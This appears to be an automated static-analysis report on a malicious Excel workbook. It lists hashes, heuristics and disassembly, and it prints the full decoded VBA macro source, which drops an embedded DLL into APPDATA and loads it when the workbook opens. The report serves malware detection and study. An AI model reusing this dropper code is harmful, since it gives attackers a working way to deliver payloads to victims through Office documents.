Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7925423fd0655133…

MALICIOUS

Office (OLE)

718.5 KB Created: 2019-08-30 09:14:50 Authoring application: Microsoft Excel First seen: 2020-02-04
MD5: bffcd7de429220cb8225de11212e0ef8 SHA-1: f1e76fa18d167a8eece411f90d5a4e9600362d91 SHA-256: 7925423fd0655133ec7b1eff6ba1705354cfbbace668bc2b21aec11d06f414e2
496 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1137.003 DLL Search Order Hijacking T1027 Obfuscated Files or Information T1105 Ingress Tool Transfer

The sample is an Excel file containing a Workbook_Open VBA macro that executes an Excel4 macro. This macro is designed to launch an embedded PE executable, likely for further malicious activity. The presence of `map_studio1.dll` and `map_studio2.dll` suggests potential DLL search order hijacking or loading of malicious libraries.

Heuristics 13

  • ClamAV: Xls.Malware.Sdrop-7173293-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Sdrop-7173293-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER
    The compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro, while the decompressed source does not — the VBA-stomping shape of the ActiveX-event XLM stager. The control event bridges into XLM formula execution to call Win32 / drop payloads, hidden from source-level scanners.
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
            Set oApp = CreateObject("Shell.Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    UserForm2.TextBox1.Tag = Environ("TEMP")
UserForm2.TextBox2.Tag = Environ("APPDATA")
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    Attempted x86 opcode disassembly
    00016895  64a130000000      mov eax, dword ptr fs:[0x30]
0001689B  8b4068            mov eax, dword ptr [eax + 0x68]
0001689E  c1e808            shr eax, 8
000168A1  a801              test al, 1
000168A3  7510              jne 0x168b5
000168A5  ff7508            push dword ptr [ebp + 8]
000168A8  ff1508410210      call dword ptr [0x10024108]
000168AE  50                push eax
000168AF  ff150c410210      call dword ptr [0x1002410c]
000168B5  ff7508            push dword ptr [ebp + 8]
000168B8  e84f000000        call 0x1690c
000168BD  59                pop ecx
000168BE  ff7508            push dword ptr [ebp + 8]
000168C1  ff153c410210      call dword ptr [0x1002413c]
000168C7  cc                int3
000168C8  6a00              push 0
000168CA  ff15d8400210      call dword ptr [0x100240d8]
000168D0  8bc8              mov ecx, eax
000168D2  85c9              test ecx, ecx
000168D4  7503              jne 0x168d9
000168D6  32c0              xor al, al
000168D8  c3                ret
000168D9  b84d5a0000        mov eax, 0x5a4d
000168DE  663901            cmp word ptr [ecx], ax
000168E1  75f3              jne 0x168d6
000168E3  8b413c            mov eax, dword ptr [ecx + 0x3c]
000168E6  03c1              add eax, ecx
000168E8  813850450000      cmp dword ptr [eax], 0x4550
000168EE  75e6              jne 0x168d6
000168F0  b90b010000        mov ecx, 0x10b
  • PEB access via GS segment (x64) high SC_PEB_ACCESS_X64
    PEB access via GS segment (x64)
    Disassembly
    Attempted x86 opcode disassembly
    00053603  65488b042560000000  mov rax, qword ptr gs:[0x60]
0005360C  8b90bc000000      mov edx, dword ptr [rax + 0xbc]
00053612  c1ea08            shr edx, 8
00053615  f6c201            test dl, 1
00053618  7511              jne 0x5362b
0005361A  ff15e6140100      call qword ptr [rip + 0x114e6]
00053620  488bc8            mov rcx, rax
00053623  8bd3              mov edx, ebx
00053625  ff15e3140100      call qword ptr [rip + 0x114e3]
0005362B  8bcb              mov ecx, ebx
0005362D  e80c000000        call 0x5363e
00053632  8bcb              mov ecx, ebx
00053634  ff153c150100      call qword ptr [rip + 0x1153c]
0005363A  cc                int3
0005363B  cc                int3
0005363C  cc                int3
0005363D  cc                int3
0005363E  48895c2408        mov qword ptr [rsp + 8], rbx
00053643  57                push rdi
00053644  4883ec20          sub rsp, 0x20
00053648  488364243800      and qword ptr [rsp + 0x38], 0
0005364E  4c8d442438        lea r8, [rsp + 0x38]
00053653  8bf9              mov edi, ecx
00053655  488d15ea9d0100    lea rdx, [rip + 0x19dea]
0005365C  33c9              xor ecx, ecx
0005365E  ff                .byte 0xff
0005365F  15                .byte 0x15
00053660  1a                .byte 0x1a
00053661  15                .byte 0x15
00053662  01                .byte 0x01
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6837 bytes
SHA-256: cbee3f708df6ef158f6df933d4e20e53bb6ed05cfa98ab90e9d1694719e58150
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wbO"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub Workbook_Open()
ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"

UserForm2.TextBox1.Tag = Environ("TEMP")
UserForm2.TextBox2.Tag = Environ("APPDATA")

ChDir (Environ("TEMP"))

    UserForm1.show
ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"
End Sub


Attribute VB_Name = "Page1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
#If Win64 Then
    Public Declare PtrSafe Function SuS Lib _
        "map_studio2.dll" () As Integer
    Public Declare PtrSafe Function SuS2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
#Else
   Public Declare Function SuS2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
     Public Declare Function SuS Lib _
        "map_studio1.dll" () As Integer
#End If
        

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{A4D27385-A868-4108-A866-253E8A4BC04B}{5E8B384E-1A8A-457D-A73B-F803DEE10042}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()

End Sub

Private Sub UserForm_Activate()
DoEvents
ReplaceCurrentModule
End Sub

Private Sub UserForm_Initialize()
Call SystemButtonSettings(Me, False)

End Sub

Attribute VB_Name = "Module2"
Private Const GWL_STYLE = -16
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000

#If VBA7 Then

    Private Declare PtrSafe Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, _
        ByVal nIndex As Long) As Long
    Private Declare PtrSafe Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, _
        ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare PtrSafe Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare PtrSafe Function DrawMenuBar _
        Lib "user32" (ByVal hWnd As Long) As Long
        
#Else

    Private Declare Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" ( _
        ByVal hWnd As Long, ByVal nIndex As Long) As Long
    Private Declare Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" ( _
        ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare Function DrawMenuBar _
        Lib "user32" (ByVal hWnd As Long) As Long
  
#End If

Public Sub SystemButtonSettings(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long

windowHandle = FindWindowA(vbNullString, frm.Caption)
windowStyle = GetWindowLong(windowHandle, GWL_STYLE)

If show = False Then

    SetWindowLong windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)

Else

    SetWindowLong windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)

End If

DrawMenuBar (windowHandle)

End Sub




Public Sub KillArray(ParamArray PathList() As Variant)
    On Error Resume Next
    For Each Key In PathList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub




Public Sub Resoration(s As String, nm As String, fl As Long, num As Integer)
    Dim intFileNum As Long, bytTemp1 As Byte, bytTemp2 As Byte, bytTemp3 As Byte
    Dim DataArray() As Long

    ReDim DataArray(1 To fl)
    DataArray(1) = CByte(50 + 27)
    DataArray(2) = CByte(50 + 40)
    DataArray(3) = CByte(50 + 94)
    
    intFileNum = FreeFile
    Open s For Binary Access Read As intFileNum
    Dim cur As Integer
    cur = 1
    Do While Not EOF(intFileNum)
        Get intFileNum, , bytTemp1
        If bytTemp1 = DataArray(1) Then
           Get intFileNum, , bytTemp2
           If bytTemp2 = DataArray(2) Then
                Get intFileNum, , bytTemp3
                If bytTemp3 = DataArray(3) Then
                     If cur = num Then
                        For k = 4 To fl
                            Get intFileNum, , bytTemp1
                            DataArray(k) = bytTemp1
                            Next k
                         Exit Do
                     Else
                        cur = cur + 1
                     End If
                End If
           End If
        End If
    Loop
    Close intFileNum
    
    intFileNum = FreeFile
    Open nm For Binary Lock Read Write As #intFileNum
    For i = LBound(DataArray) To UBound(DataArray)
        Put #intFileNum, , CByte(DataArray(i))
    Next i

    Close #intFileNum
End Sub



Attribute VB_Name = "Module3"


Public Sub ReplaceCurrentModule()
    TempName = UserForm2.TextBox1.Tag & "\factory.xlsx"
    ZipName = TempName + ".zip"
    ZipFolder = UserForm2.TextBox1.Tag '& "\UnzTmp"
    Dim nm As String
    Dim size As Long
    Dim num As Integer
#If Win64 Then
    nm = UserForm2.TextBox2.Tag + "\map_studio2.dll"
    size = 284672
    num = 2
#Else
    
    nm = UserForm2.TextBox2.Tag + "\map_studio1.dll"
    size = 223232
    num = 1
#End If
        
        KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm
        
    DoEvents
        ThisWorkbook.Sheets.Copy
        Application.DisplayAlerts = False
        ActiveWorkbook.SaveAs TempName, FileFormat:=51
    DoEvents
    ActiveWorkbook.Close
    DoEvents
        
    
        FileCopy TempName, ZipName
        
        Set oApp = CreateObject("Shell.Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")
        Resoration ZipFolder + "\oleObject1.bin", nm, size, num
        
        ChDir (UserForm2.TextBox2.Tag)
        No_SuS = SuS2(nm)
        SuS

End Sub


Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{2FAC5915-C2ED-4245-9227-271C613DF8A6}{03709D13-8260-4EB0-8DC9-7CED58E1E30C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
embedded_office_00003cde.exe embedded-pe Office MZ+PE at offset 0x3CDE 720162 bytes
SHA-256: 881f1edad89d66f1489f9ce9a65ede84e1a4ffe4c4434d9c612457765dd9169b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_CREATEPROCESS, SC_STR_GETPROCADDRESS Static shellcode analysis recovered API/import strings: kernel32.dll, advapi32.dll, KERNEL32.DLL, ADVAPI32.DLL, CreateProcessW, GetProcAddress Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: MBD0006BC6F/Ole10Native 517134 bytes
SHA-256: d2dafd678bdbf552f620a6661ebf2886be460361d5095dfbdc3aa91bddfc6bc8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_PEB_ACCESS, SC_STR_CREATEPROCESS, SC_STR_GETPROCADDRESS Static shellcode analysis recovered API/import strings: kernel32.dll, advapi32.dll, KERNEL32.DLL, ADVAPI32.DLL, CreateProcessW, GetProcAddress

Open this report in the interactive analyzer, or submit your own file for analysis.